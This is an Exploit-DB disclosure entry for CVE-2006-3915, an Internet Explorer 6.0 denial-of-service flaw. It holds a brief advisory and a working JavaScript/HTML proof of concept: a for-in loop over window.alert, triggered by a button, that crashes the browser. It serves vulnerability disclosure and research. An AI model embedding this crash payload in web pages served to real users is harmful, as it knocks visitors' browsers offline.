Microsoft Internet Explorer 6.0 Native Function Iterator Denial of Service Vulnerability

2006-07-24T00:00:00
ID EDB-ID:28265
Type exploitdb
Reporter hdm
Modified 2006-07-24T00:00:00

Description

Microsoft Internet Explorer 6.0 Native Function Iterator Denial Of Service Vulnerability. CVE-2006-3915. Dos exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/19140/info

Microsoft Internet Explorer is prone to a denial-of-service vulnerability. This issue is triggered when an attacker convinces a victim user to visit a malicious website.

Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.

function Demo() {
	// Iterate through any native function reference to crash
	for (var i in window.alert) { var a = 1; }
}

</script>

Clicking the button below may crash your browser!<br><br>
<input type='button' onClick='Demo()' value='Start Demo!'>